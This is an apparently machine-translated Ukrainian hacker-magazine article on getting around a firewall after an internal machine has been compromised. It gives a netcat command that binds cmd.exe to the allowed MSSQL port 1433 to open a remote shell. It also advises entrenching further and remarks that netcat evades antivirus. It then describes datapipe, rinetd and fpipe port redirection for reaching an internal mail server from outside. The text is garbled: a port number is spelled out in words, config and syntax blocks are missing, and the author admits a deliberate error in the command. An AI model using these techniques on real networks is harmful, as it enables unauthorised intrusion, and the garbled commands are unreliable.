редирект портів

Здрастуй, Дорогий Новомосковсктель!

Як ти знаєш, комп'ютерні мережі різних підприємств і установ захищають від вторгнення з Інтернету за допомогою firewall. Firewall дозволяє блокувати всі пакети, які на думку адміністратора мережі не повинні потрапляти у внутрішню мережу ... Звичайно ж в firewall`ах знаходять дірки і деякі особистості ними навіть встигають скористатися. Але все ж основна проблема звичайно ж не в дірявість софта, а в дірявість адміна, який не зміг грамотно цей firewall налаштувати ...

Увага! Все нижче наведені приклади мають в собі деякі припущення. Все це робиться лише для того, щоб показати можливі шляхи обходу обмежень, що накладаються firewall`ом. До того ж не варто забувати, що дійсність буває набагато жахливішою ...

Уяви, що firewall блокує всі порти, крім 80 і 1433. Разом: ftpd і MSSQL ... Покладемо також, що деякий контроль за однією з машин всередині мережі у тебе є
(Не має як ти його отримав: через дірявий скрипт або за допомогою будь-якої проблеми IIS). Наше завдання - поиметь shell, для якого у нас є тільки 80 і 1433 порти ... ОК!
Закачуємо на цей сайтец чудову утилітки netcat. За допомогою неї ми і відкриємо тобі shell замість
MSSQL (через те, що трафік на порт +1433 дозволений файерволом), для цього потрібно виконати наступну команду:

nc -L -p одна тисяча чотиреста тридцять три -e cmd.exe IP

nc - виконуваний файл netcat

  • -L - p 1 433 - наказує слухати вхідні з'єднання на 1 433 порту
  • -e cmd.exe - у відповідь на вхідні повідомлення запускати shell (cmd.exe для NT, в * nix було б щось на кшталт
    / Bin / bash)

Тільки май на увазі, що при такому варіанті запуску твій shell провис тільки до наступного рестарту, тому, отримавши shell спробуй закріпитися більш грунтовно, хоча ... ти знаєш, досвід показує, що більшість серверів мають звичай перезавантажуватися о-о-дуже рідко.

Можливо, багато хто запитає: «А чому не бекдор?». - Ну хоча б тому, що антивіруси ще ніхто не відміняв, а Netcat перед ними кристально чистий ...

Важливе зауваження! Порти з номерами менші за 1024 може використовувати тільки root, тому, якщо ти обділений подібним щастям, то твоя мета - все порти з номерами вище зазначеного.

Інша ситуація - firewall пропускає трафік на порти з о-о-дуже великими номерами. Деякі права всередині мережі у нас є, але ми хочемо приходити ззовні і користуватися поштовим сервером внутрішньої мережі, хоча при такому розкладі ми можемо користуватися чим завгодно ;-). Допоможе нам у цій ситуації така проста операція, як редирект (перенаправлення) портів. Редирект можна здійснити за допомогою спеціального софту; принцип його роботи в загальному вигляді полягає в наступному: очікується вхідні повідомлення на певному порту і як тільки з'єднання отримано
перенаправляє його на вказаний IP: порт (причому IP може бути будь-яким, в тому числі і 127.0.0.1). Отже, ось що homo sapiens придумали для редиректу:

Напевно найвідоміша тулза, уроджена
в * nix. Варіант, написаний на Сі ти з
легкістю подрежешь на сайті packetstormsecurity.nl. І чого б це я сказав «уроджена
в * nix »? Та тому, що в свою час X не оминув її своєю увагою, вірніше її не оминув Cutter, який переписав те ж саме на Perl, причому і під * nix, і під Windows. Цю версію ти можеш взяти
на нашому сайті. Отже, ми ломимося на поштовий сервер внутрішньої мережі. Для цього на уділеної машині запускаємо datapipe наступним чином:

datapipe 65000 25 IP

Творець даного інструменту визначив його як «редирект сервер». Що, в принципі, дуже навіть правильно:
rinetd запускається як єдиний процес, здатний обслуговувати велику кількість з'єднань.
Налаштування rinetd здійснюється за допомогою config-файлу (за умовчанням це /etc/rinetd.conf), який має наступну структуру:

Після редагування config-файлу rinetd можна запустити командою

rinetd -c config_file

Параметр -з слід вказувати в тому випадку, якщо місцезнаходження config-файлу відрізняється від дефолтовая
/etc/rinetd.conf. Важливе зауваження! Rinetd здатний редирект тільки з'єднання, які вимагають один сокет (до яких не відноситься наприклад ftp).

Дуже зручний інструмент редиректу для Windows, дуже схожий на datapipe. Fpipe можна підняти з
сайту розробника. Синтаксис програми:

А взагалі-то, редирект має просто найширші можливості застосування: від обходу firewall `до отримання халявного інету. Але це вже тема для зовсім іншої статті ...

Увага! У командному рядку Netcat
спеціально допущена помилка - вважайте це
«Головоломкою для Хакера №5» 🙂

Покажи цю статтю друзям:

Схожі статті